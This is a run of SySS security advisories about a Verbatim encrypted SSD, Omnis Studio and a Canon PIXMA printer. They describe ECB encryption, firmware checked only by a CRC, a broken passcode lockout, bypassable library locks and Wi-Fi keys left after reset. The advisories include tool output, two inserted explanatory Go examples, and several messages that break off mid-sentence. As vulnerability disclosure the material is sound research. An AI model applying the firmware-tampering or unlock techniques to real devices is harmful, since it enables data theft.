| | | |\  `--. \ | |   | '__/ _` |/ __| |/ / _ \ '__|
\ \_/ / |\  \/\__/ / | \__/\ | | (_| | (__|   <  __/ |
 \___/\_| \_/\/   \/_|  \__,_|\___|_|\_\___|_|
 ... finds out your passcode.

Verbatim Keypad Secure Cracker v0.6 by Matthias Deeg 
 (c) 2022

---
[*] Found 8 l

[FD] [SYSS-2022-044]: Verbatim Store 'n' Go Secure Portable SSD - Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) (CVE-2022-28382)

2022-10-08 Thread Matthias Deeg

Advisory ID:               SYSS-2022-044
Product:                   Store 'n' Go Secure Portable SSD
Manufacturer:              Verbatim
Affected Version(s):       #53402 (GDMSLK02 C-INIC3637-V1.1)
Tested Version(s):         #53402 (GDMSLK02 C-INIC3637-V1.1)
Vulnerability Type:        Use of a Cryptographic Primitive with a Risky
                           Implementation (CWE-1240)
Risk Level:                Low
Solution Status:           Fixed
Manufacturer Notification: 2022-06-29
Solution Date:             2022-07
Public Disclosure:         2022-10-07
CVE Reference:             CVE-2022-28382
Author of Advisory:        Matthias Deeg (SySS GmbH)



Overview:

The Verbatim Store 'n' Go Secure Portable SSD is a portable USB drive
with AES 256-bit hardware encryption and a built-in keypad for passcode
entry.

The manufacturer describes the product as follows:

"The AES 256-bit Hardware Encryption seamlessly encrypts all data on the
drive in real-time with a built-in keypad for password input. The hard
drive does not store passwords in the computer or system’s volatile
memory making it far more secure than software encryption. Also, if it
falls into the wrong hands, the hard drive will lock and require
re-formatting after 20 failed password attempts."[1]

Due to the use of an insecure AES mode of operation (Electronic
Codebook), an attacker may be able to extract information even from
encrypted data, for example by observing repeating byte patterns.



Vulnerability Details:

When analyzing the external storage device Verbatim Store 'n' Go Secure
Portable SSD, Matthias Deeg found out that the firmware of the
USB-to-SATA bridge controller INIC-3637EN uses AES-256 with the ECB
(Electronic Codebook) mode.

This mode of operation of block ciphers like AES always encrypts
identical plaintext blocks, in this case blocks of 16 bytes, to
identical ciphertext blocks.

For some data, for instance bitmap images, the resulting lack of
diffusion across blocks in ECB mode can leak sensitive information even
from encrypted data.

One famous example for this is an ECB-encrypted image of the TUX
penguin, which, for instance, is referenced in the Wikipedia article
about block cipher modes of operation[2] to illustrate this issue.

Thus, the use of the ECB operation mode can put the confidentiality of
specific information at risk, even in an encrypted form.

Additionally, in attack scenarios where an attacker has short-time
physical access to a Verbatim Store 'n' Go Secure Portable SSD and
later returns it to its legitimate owner, the attacker may be able to
compromise the integrity of the stored data by replacing specific
encrypted 16-byte blocks with other ones, exploiting the fact that
identical 16-byte plaintext blocks result in identical 16-byte
ciphertext blocks.



Proof of Concept (PoC):

The same plaintext pattern with the length of 16 bytes was written
several times to an unlocked Verbatim Store 'n' Go Secure Portable SSD.

When the SSD was then read using another SSD enclosure, the same 16
byte long ciphertext pattern could be observed for the corresponding
plaintext data.
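An added Go example (not SySS's or Verbatim's code) that reproduces the observation of this PoC in software: a 16-byte pattern repeated eight times is encrypted with AES-256-ECB and, for contrast, AES-256-CBC, and a block-repetition counter that can equally be run over a raw drive dump shows the ECB fingerprint described in the Vulnerability Details. The key, IV and pattern are constructed.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"fmt"
)

const blockSize = 16 // AES block size

// ecbEncrypt encrypts each 16-byte block independently, which is what ECB
// mode means: equal plaintext blocks under one key give equal ciphertext blocks.
func ecbEncrypt(key, plain []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(plain)%blockSize != 0 {
		return nil, fmt.Errorf("plaintext length %d is not a multiple of %d", len(plain), blockSize)
	}
	out := make([]byte, len(plain))
	for i := 0; i < len(plain); i += blockSize {
		block.Encrypt(out[i:i+blockSize], plain[i:i+blockSize])
	}
	return out, nil
}

// cbcEncrypt chains each block into the next, so repeated plaintext blocks
// no longer produce repeated ciphertext blocks. Shown for contrast only;
// sector-level disk encryption normally uses a tweaked mode such as XTS.
func cbcEncrypt(key, iv, plain []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(plain)%blockSize != 0 {
		return nil, fmt.Errorf("plaintext length %d is not a multiple of %d", len(plain), blockSize)
	}
	out := make([]byte, len(plain))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, plain)
	return out, nil
}

// duplicateBlocks counts 16-byte blocks that repeat an earlier block (each
// repeat counts once). Run over a raw read of the drive after a repeating
// pattern was written, a count close to the number of repeats is the ECB
// fingerprint the PoC observed; a mode with diffusion across blocks yields 0.
func duplicateBlocks(data []byte) int {
	seen := make(map[[blockSize]byte]bool)
	dup := 0
	for i := 0; i+blockSize <= len(data); i += blockSize {
		var b [blockSize]byte
		copy(b[:], data[i:i+blockSize])
		if seen[b] {
			dup++
		}
		seen[b] = true
	}
	return dup
}

// repeatedPattern constructs the PoC input: one 16-byte pattern written n times.
func repeatedPattern(n int) []byte {
	pattern := []byte("SYSS-ECB-PATTERN") // exactly 16 bytes, constructed
	out := make([]byte, 0, n*blockSize)
	for i := 0; i < n; i++ {
		out = append(out, pattern...)
	}
	return out
}

func main() {
	key := []byte("0123456789abcdef0123456789abcdef") // constructed 32-byte AES-256 key
	iv := make([]byte, blockSize)                     // all-zero IV, for a deterministic demo
	plain := repeatedPattern(8)
	ecb, _ := ecbEncrypt(key, plain)
	cbc, _ := cbcEncrypt(key, iv, plain)
	fmt.Printf("repeated blocks in plaintext:      %d\n", duplicateBlocks(plain))
	fmt.Printf("repeated blocks after AES-256-ECB: %d\n", duplicateBlocks(ecb))
	fmt.Printf("repeated blocks after AES-256-CBC: %d\n", duplicateBlocks(cbc))
}
```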



Solution:

The described security issue was fixed by the Verbatim "Security Update
July 2022"[4].



Disclosure Timeline:

2022-06-29: Vulnerability reported to manufacturer
2022-07   : Manufacturer publishes security update[4]
2022-10-07: Public release of security advisory



References:

[1] Product website for Verbatim Store 'n' Go Secure Portable SSD
https://www.verbatim-europe.co.uk/en/prod/store-n-go-portable-ssd-with-keypad-access-256gb-53402/
[2] Wikipedia article about block cipher modes of operation
https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_codebook_(ECB)
[3] SySS Security Advisory SYSS-2022-044
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-044.txt
[4] Security Update July 2022: Store 'n' Go Portable SSD
https://www.verbatim-europe.co.uk/en/support-centre/?part_no=53402
[5] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key: 
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc

Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The 

[FD] [SYSS-2022-045]: Verbatim Store 'n' Go Secure Portable SSD - Missing Immutable Root of Trust in Hardware (CWE-1326) (CVE-2022-28383)

2022-10-08 Thread Matthias Deeg

Advisory ID:               SYSS-2022-045
Product:                   Store 'n' Go Secure Portable SSD
Manufacturer:              Verbatim
Affected Version(s):       #53402 (GDMSLK02 C-INIC3637-V1.1)
Tested Version(s):         #53402 (GDMSLK02 C-INIC3637-V1.1)
Vulnerability Type:        Missing Immutable Root of Trust in Hardware
                           (CWE-1326)
Risk Level:                Medium
Solution Status:           Fixed
Manufacturer Notification: 2022-06-29
Solution Date:             -
Public Disclosure:         2022-10-07
CVE Reference:             CVE-2022-28383
Author of Advisory:        Matthias Deeg (SySS GmbH)



Overview:

The Verbatim Store 'n' Go Secure Portable SSD is a portable USB drive
with AES 256-bit hardware encryption and a built-in keypad for passcode
entry.

The manufacturer describes the product as follows:

"The AES 256-bit Hardware Encryption seamlessly encrypts all data on the
drive in real-time with a built-in keypad for password input. The hard
drive does not store passwords in the computer or system’s volatile
memory making it far more secure than software encryption. Also, if it
falls into the wrong hands, the hard drive will lock and require
re-formatting after 20 failed password attempts."[1]

Due to insufficient firmware validation, an attacker can store
malicious firmware code for the USB-to-SATA bridge controller on the
external drive, which is then executed.



Vulnerability Details:

When analyzing the external data storage Verbatim Store 'n' Go Secure
Portable SSD, Matthias Deeg found out that the validation of the
firmware for the USB-to-SATA bridge controller INIC-3637EN only consists
of a simple CRC-16 check (XMODEM CRC-16).

Thus, an attacker is able to store malicious firmware code for the
INIC-3637EN with a correct checksum on the used SPI flash memory chip
(XT25F01D), which then gets successfully executed by the USB-to-SATA
bridge controller.

For instance, this security vulnerability could be exploited in a
so-called "supply chain attack" when the device is still on its way to
its legitimate user.

An attacker with temporary physical access to the device while it is in
the supply chain could, for example, program a modified firmware on the
Verbatim Keypad Secure which always uses an attacker-controlled AES key
for the data encryption.

If, later on, the attacker gains access to the used USB drive, he
can simply decrypt all contained user data.



Proof of Concept (PoC):

SySS was able to read and write the SPI flash memory containing the
firmware of the INIC-3637EN controller (128 KB) using a universal
programmer.

By analyzing the dumped memory content, SySS found out that the
INIC-3637EN firmware is stored from the file offset 0x4000 to the file
offset 0x1BFFB, and that the corresponding XMODEM CRC-16 is stored at
the file offset 0x1FFFC.

Matthias Deeg developed a simple Python tool for updating the checksum
of modified firmware images before writing them to the SPI flash memory
chip.

The following output exemplarily shows updating a modified firmware
image:

$ python update-firmaware.py firmware_hacked.bin
Verbatim Store 'n' Go Firmware Updater v0.1 - Matthias Deeg, SySS GmbH 
(c) 2022

[*] Computed CRC-16 (0x0874) does not match stored CRC-16 (0x5E8C).
[*] Successfully updated firmware file
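The CRC-16 check described above beside the signature check an immutable root of trust would perform instead, as an added Go example (not the SySS updater tool or the INIC-3637EN firmware): the offsets 0x4000, 0x1BFFB and 0x1FFFC come from the advisory; the inclusive end offset, big-endian CRC storage, the signature location 0x1FF00, the Ed25519 key seed and the body fill byte are assumptions.

```go
package main

import (
	"crypto/ed25519"
	"encoding/binary"
	"fmt"
)

// Image layout from the advisory: a 128 KB SPI flash image, firmware body
// from 0x4000 to 0x1BFFB, XMODEM CRC-16 stored at 0x1FFFC. Assumed here:
// the end offset is inclusive and the CRC is stored big-endian.
const (
	imageSize = 128 * 1024
	fwStart   = 0x4000
	fwEnd     = 0x1BFFB
	crcOffset = 0x1FFFC
	// sigOffset is an assumed, otherwise unused region chosen to hold a
	// 64-byte signature for the hardened check; the real image has no such field.
	sigOffset = 0x1FF00
)

// crc16Xmodem implements CRC-16/XMODEM: polynomial 0x1021, initial value 0,
// no reflection, no final XOR (check value for "123456789" is 0x31C3).
func crc16Xmodem(data []byte) uint16 {
	var crc uint16
	for _, b := range data {
		crc ^= uint16(b) << 8
		for i := 0; i < 8; i++ {
			if crc&0x8000 != 0 {
				crc = crc<<1 ^ 0x1021
			} else {
				crc <<= 1
			}
		}
	}
	return crc
}

func firmwareBody(img []byte) []byte { return img[fwStart : fwEnd+1] }

// crcValid is the only integrity check the advisory found in the bridge
// controller: it detects accidental corruption, not deliberate modification,
// because anyone who can write the flash can also write a matching CRC.
func crcValid(img []byte) bool {
	return crc16Xmodem(firmwareBody(img)) == binary.BigEndian.Uint16(img[crcOffset:])
}

// signatureValid is the check an immutable root of trust would perform
// instead: an Ed25519 signature over the body is verified against a vendor
// public key fixed in the controller, which an attacker cannot forge.
func signatureValid(img []byte, pub ed25519.PublicKey) bool {
	sig := img[sigOffset : sigOffset+ed25519.SignatureSize]
	return ed25519.Verify(pub, firmwareBody(img), sig)
}

// demoKeys derives a fixed Ed25519 key pair from a constructed seed so the
// example is deterministic; a real vendor key would never be embedded like this.
func demoKeys() (ed25519.PublicKey, ed25519.PrivateKey) {
	seed := []byte("constructed-32-byte-demo-seed!!!") // exactly 32 bytes
	priv := ed25519.NewKeyFromSeed(seed)
	return priv.Public().(ed25519.PublicKey), priv
}

// buildImage constructs a signed image with a valid CRC from a fill byte.
func buildImage(priv ed25519.PrivateKey, fill byte) []byte {
	img := make([]byte, imageSize)
	for i := fwStart; i <= fwEnd; i++ {
		img[i] = fill
	}
	binary.BigEndian.PutUint16(img[crcOffset:], crc16Xmodem(firmwareBody(img)))
	copy(img[sigOffset:], ed25519.Sign(priv, firmwareBody(img)))
	return img
}

// modifiedImage changes one body byte and rewrites the CRC, which is all
// that is needed to satisfy the controller's check; the signature stays stale.
func modifiedImage(img []byte) []byte {
	mod := append([]byte(nil), img...)
	mod[fwStart+0x100] ^= 0xFF
	binary.BigEndian.PutUint16(mod[crcOffset:], crc16Xmodem(firmwareBody(mod)))
	return mod
}

func main() {
	pub, priv := demoKeys()
	orig := buildImage(priv, 0x5A)
	mod := modifiedImage(orig)
	fmt.Printf("original: crc ok=%v signature ok=%v\n", crcValid(orig), signatureValid(orig, pub))
	fmt.Printf("modified: crc ok=%v signature ok=%v\n", crcValid(mod), signatureValid(mod, pub))
}
```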



Solution:

SySS GmbH is not aware of a solution for the described security issue.



Disclosure Timeline:

2022-06-29: Vulnerability reported to manufacturer
2022-10-07: Public release of security advisory



References:

[1] Product website for Verbatim Store 'n' Go Secure Portable SSD
https://www.verbatim.com.au/products/store-n-go-portable-ssd-with-keypad-access/
[2] SySS Security Advisory SYSS-2022-045
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-045.txt
[3] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key: 
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc

Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this 

[FD] [SYSS-2022-046]: Verbatim Store 'n' Go Secure Portable SSD - Expected Behavior Violation (CWE-440) (CVE-2022-28386)

2022-10-08 Thread Matthias Deeg

Advisory ID:               SYSS-2022-046
Product:                   Store 'n' Go Secure Portable SSD
Manufacturer:              Verbatim
Affected Version(s):       #53402 (GDMSLK02 C-INIC3637-V1.1)
Tested Version(s):         #53402 (GDMSLK02 C-INIC3637-V1.1)
Vulnerability Type:        Expected Behavior Violation (CWE-440)
Risk Level:                Low
Solution Status:           Open
Manufacturer Notification: 2022-06-29
Solution Date:             -
Public Disclosure:         2022-10-07
CVE Reference:             CVE-2022-28386
Author of Advisory:        Matthias Deeg (SySS GmbH)



Overview:

The Verbatim Store 'n' Go Secure Portable SSD is a portable USB drive
with AES 256-bit hardware encryption and a built-in keypad for passcode
entry.

The manufacturer describes the product as follows:

"The AES 256-bit Hardware Encryption seamlessly encrypts all data on the
drive in real-time with a built-in keypad for password input. The hard
drive does not store passwords in the computer or system’s volatile
memory making it far more secure than software encryption. Also, if it
falls into the wrong hands, the hard drive will lock and require
re-formatting after 20 failed password attempts."[1]

The security feature that is supposed to lock the SSD and require
reformatting after 20 failed unlock attempts does not work as specified.



Vulnerability Details:

When analyzing the external data storage Verbatim Store 'n' Go Secure
Portable SSD, Matthias Deeg found out that the device will not lock and
require reformatting after 20 failed passcode attempts, as described in
the product description[1] and the corresponding user manual.

Thus, an attacker with physical access to such an external SSD can try
more passcodes in order to unlock the device.

During the security analysis, SySS could not find out how many failed
passcode attempts would actually lock the device and require
reformatting it, as this device state was never reached.

Additionally, trying to find out the correct passcode by entering
candidates manually or automatically via the provided keypad is rather
inefficient compared to the equally possible offline brute-force attack
described in SySS security advisory SYSS-2022-043[2].



Proof of Concept (PoC):

SySS tried to unlock the Verbatim Store 'n' Go Secure Portable SSD with
more than 20 consecutively entered wrong passcodes.

Afterwards, contrary to the product description, the external SSD could
still be successfully unlocked with the correct passcode, and access to
the previously stored data was possible without any issues.



Solution:

SySS GmbH is not aware of a solution for the described security issue.



Disclosure Timeline:

2022-06-29: Vulnerability reported to manufacturer
2022-10-07: Public release of security advisory



References:

[1] Product website for Verbatim Store 'n' Go Secure Portable SSD
https://www.verbatim.com.au/products/store-n-go-portable-ssd-with-keypad-access/
[2] SySS Security Advisory SYSS-2022-043
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-043.txt
[3] SySS Security Advisory SYSS-2022-046
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-046.txt
[4] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key: 
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc

Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en



[FD] [SYSS-2023-005]: Omnis Studio - Expected Behavior Violation (CWE-440) (CVE-2023-38335)

2023-07-21 Thread Matthias Deeg via Fulldisclosure

Advisory ID:               SYSS-2023-005
Product:                   Omnis Studio
Manufacturer:              Omnis Software Ltd.
Affected Version(s):       10.22.00
Tested Version(s):         10.22.00
Vulnerability Type:        Expected Behavior Violation (CWE-440)
Risk Level:                Low
Solution Status:           Open
Manufacturer Notification: 2023-03-30
Solution Date:             -
Public Disclosure:         2023-07-20
CVE Reference:             CVE-2023-38335
Author of Advisory:        Matthias Deeg (SySS GmbH)



Overview:

Omnis Studio is a rapid application development tool for developing
cross-platform software applications.

The manufacturer describes the product as follows:

"Omnis Studio is a powerful development environment that lets you deploy
apps to virtually any device, on any platform, including tablets,
smartphones, and desktop computers." [1]

Due to implementation issues, "always private" Omnis libraries can be
opened by the Omnis Studio browser.



Vulnerability Details:

Omnis Studio supports a feature for making Omnis libraries "always
private".

Making an Omnis library "always private" is supposed to be an
irreversible operation according to the Omnis Studio software.

However, during a security analysis of an application developed with
Omnis Studio using this feature, Matthias Deeg found out that it is
still possible to load "always private" Omnis libraries with the Omnis
Studio browser by simply bypassing a specific check.

This violates the expected behavior of an "irreversible operation".



Proof of Concept (PoC):

For demonstrating the described security issue, Matthias Deeg developed
a proof-of-concept software tool which allows loading private Omnis
libraries in the Omnis Studio browser.

>OmnisUnlocker.exe

_
   /_   _ _ 
 \
  //  ___| /  ___/  ___| 
  \
 | \ `--. _   _\ `--.\ `--. 
   |
 |  `--. \ | | |`--. \`--. \ 
   |
 | /\__/ / |_| /\__/ /\__/ / 
   |
  \\/ \__, \/\/   ... unlocks Omnis Studio! 
  /
   \  __/ | 
 /
   / |___/ 
__/

  / _/
(__) /_/
(oo)
  /--\/
 / |____||
*  ||   ||
   ^^   ^^
SySS Omnis Unlocker v1.0 by Matthias Deeg  - (c) 2023

[+] The Omnis Studio process was patched successfully.
Now you can:
* load private Omnis libraries in the browser, and
* analyze locked classes.

This security issue is also demonstrated in our SySS Proof of Concept
Video "Reversing the Irreversible - Part I" on our YouTube channel [3].



Solution:

SySS GmbH is not aware of a solution for the described security issue.



Disclosure Timeline:

2023-03-30: Vulnerability reported to manufacturer
2023-04-06: Vulnerability reported to manufacturer again
2023-07-20: Public release of security advisory



References:

[1] Product website for Omnis Studio
https://www.omnis.net/
[2] SySS Security Advisory SYSS-2023-005
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-005.txt
[3] SySS Proof of Concept Video: Reversing the Irreversible - Part I
https://www.youtube.com/watch?v=2fjMgPqjobQ
[4] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy


Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key: 
https://www.syss.de/fileadmin/dokumente/PGPKeys/Matthias_Deeg.asc

Key Fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en




[FD] [SYSS-2023-006]: Omnis Studio - Expected Behavior Violation (CWE-440) (CVE-2023-38334)

2023-07-21 Thread Matthias Deeg via Fulldisclosure

Advisory ID:               SYSS-2023-006
Product:                   Omnis Studio
Manufacturer:              Omnis Software Ltd.
Affected Version(s):       10.22.00
Tested Version(s):         10.22.00
Vulnerability Type:        Expected Behavior Violation (CWE-440)
Risk Level:                Low
Solution Status:           Open
Manufacturer Notification: 2023-03-30
Solution Date:             -
Public Disclosure:         2023-07-20
CVE Reference:             CVE-2023-38334
Author of Advisory:        Matthias Deeg (SySS GmbH)



Overview:

Omnis Studio is a rapid application development tool for developing
cross-platform software applications.

The manufacturer describes the product as follows:

"Omnis Studio is a powerful development environment that lets you deploy
apps to virtually any device, on any platform, including tablets,
smartphones, and desktop computers."[1]

Due to implementation issues, locked classes in Omnis libraries can be
unlocked and thus further analyzed and modified via the Omnis Studio
browser.



Vulnerability Details:

Omnis Studio supports an irreversible feature for locking classes within
Omnis libraries.

According to the Omnis Studio software, it should be no longer possible
to delete, view, change, copy, rename, duplicate, or print a locked
class.

However, during a security analysis of an application developed with
Omnis Studio using this feature, Matthias Deeg found out that it is
possible to unlock previously locked classes of Omnis libraries, for
instance by simply bypassing specific checks in Omnis Studio.

This allows for further analyzing and also deleting, viewing, changing,
copying, renaming, duplicating, or printing previously locked Omnis
classes.

This violates the expected behavior of an "irreversible operation".



Proof of Concept (PoC):

For demonstrating the described security issue, Matthias Deeg developed
a proof-of-concept software tool which allows unlocking locked classes
within Omnis libraries and further analyzing and modifying them within
Omnis Studio.

>OmnisUnlocker.exe

_
   /_   _ _ 
 \
  //  ___| /  ___/  ___| 
  \
 | \ `--. _   _\ `--.\ `--. 
   |
 |  `--. \ | | |`--. \`--. \ 
   |
 | /\__/ / |_| /\__/ /\__/ / 
   |
  \\/ \__, \/\/   ... unlocks Omnis Studio! 
  /
   \  __/ | 
 /
   / |___/ 
__/

  / _/
(__) /_/
(oo)
  /--\/
 / |||
*  ||   ||
   ^^   ^^
SySS Omnis Unlocker v1.0 by Matthias Deeg  - (c) 2023

[+] The Omnis Studio process was patched successfully.
Now you can:
* load private Omnis libraries in the browser, and
* analyze locked classes.



Solution:

SySS GmbH is not aware of a solution for the described security issue.



Disclosure Timeline:

2023-03-30: Vulnerability reported to manufacturer
2023-04-06: Vulnerability reported to manufacturer again
2023-07-20: Public release of security advisory



References:

[1] Product website for Omnis Studio
https://www.omnis.net/
[2] SySS Security Advisory SYSS-2023-006
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-006.txt
[3] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key: 
https://www.syss.de/fileadmin/dokumente/PGPKeys/Matthias_Deeg.asc

Key Fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en



[FD] [SYSS-2023-011]: Canon PIXMA TR4550 and other inkjet printer models - Insufficient or Incomplete Data Removal, within Hardware Component (CWE-1301)

2023-08-03 Thread Matthias Deeg via Fulldisclosure

Advisory ID:               SYSS-2023-011
Product:                   PIXMA TR4550
Manufacturer:              Canon
Affected Version(s):       1.020 / 1.080
                           also affects many other Canon inkjet printer
                           models[4]
Tested Version(s):         1.020 / 1.080
Vulnerability Type:        Insufficient or Incomplete Data Removal
                           within Hardware Component (CWE-1301)
                           Insufficiently Protected Credentials
                           (CWE-522)
Risk Level:                Low
Solution Status:           Fixed
Manufacturer Notification: 2023-04-06
Solution Date:             2023-07-31
Public Disclosure:         2023-08-03
CVE Reference:             No CVE ID from Canon PSIRT
Author of Advisory:        Manuel Stotz, SySS GmbH



Overview:

The Canon PIXMA TR4550 is an entry-level 4-in-1 printer equipped with
Wi-Fi connectivity.

The manufacturer describes the product as follows (see [1]):

"Ready to adapt to your smart home office environment, this efficient
4-In-One printer requires minimal space but gives maximum support to
your projects. Whether scanning a document, copying an ID, faxing an
invoice or printing posters, PIXMA TR4550 has the functionality to keep
up with your business needs. Equipped with smart Wi-Fi connectivity to
optimise management of functions and features, this front-loading
4-In-One printer is the compact solution that saves space, streamlines
ink usage and brings productivity to the forefront."

The unprotected storage of credentials and the insufficient data removal
during a factory reset allow sensitive data to be read out afterwards.



Vulnerability Details:

The Canon PIXMA TR4550 stores sensitive data, such as the SSID and the
Wi-Fi pre-shared key (PSK), unencrypted in its persistent storage
(EEPROM).

Resetting the product to factory settings (via 'Setup', 'Device
settings', 'Reset setting' and 'All data') does not securely delete this
sensitive information.



Proof of Concept (PoC):

SySS could successfully perform a proof-of-concept attack via the
following steps:

* Configure and establish a Wi-Fi connection.
* Reset all data (Setup, Device settings, Reset setting, All data).
* Disassemble the printer and locate the EEPROM on the PCB.
* Create an EEPROM memory dump.
* Search and locate the configured SSID and PSK in the memory dump.



Solution:

Canon PSIRT published its security advisory "Vulnerability
Mitigation/Remediation for Inkjet Printers (Home and Office/Large
Format)" (CP2023-003)[3], describing how sensitive information should be
deleted on the affected printers[5].



Disclosure Timeline:

2023-04-06: Vulnerability reported to manufacturer
2023-04-12: Canon PSIRT creates ticket
2023-04-27: Update from Canon concerning ongoing analysis
2023-05-15: Canon confirms security issue
2023-05-23: Agreement on public disclosure date
2023-07-17: Canon PSIRT informs about scheduled publication of their
            security advisory
2023-07-31: Canon PSIRT publishes their security advisory "Vulnerability
            Mitigation/Remediation for Inkjet Printers (Home and
            Office/Large Format)" (CP2023-003)[3]
2023-08-03: Public release of SySS security advisory



References:

[1] Product website for Canon PIXMA TR4550
https://www.canon-europe.com/support/consumer/products/printers/pixma/tr-series/pixma-tr4550.html
[2] SySS Security Advisory SYSS-2023-011
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-011.txt
[3] CP2023-003 Vulnerability Mitigation/Remediation for Inkjet Printers
    (Home and Office/Large Format)
https://psirt.canon/advisory-information/cp2023-003/
[4] List of affected printers
https://canon.a.bigcontent.io/v1/static/affected-models_20230731_d04c0d9895124b65acd21ca68357dcdc
[5] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy



Credits:

This security vulnerability was found by Manuel Stotz of SySS GmbH.

E-Mail: manuel.stotz (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Manuel_Stotz.asc
Key Fingerprint: F051 5B74 7E70 193E 7F66 0133 E790 F68A BCE6 8C6D



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest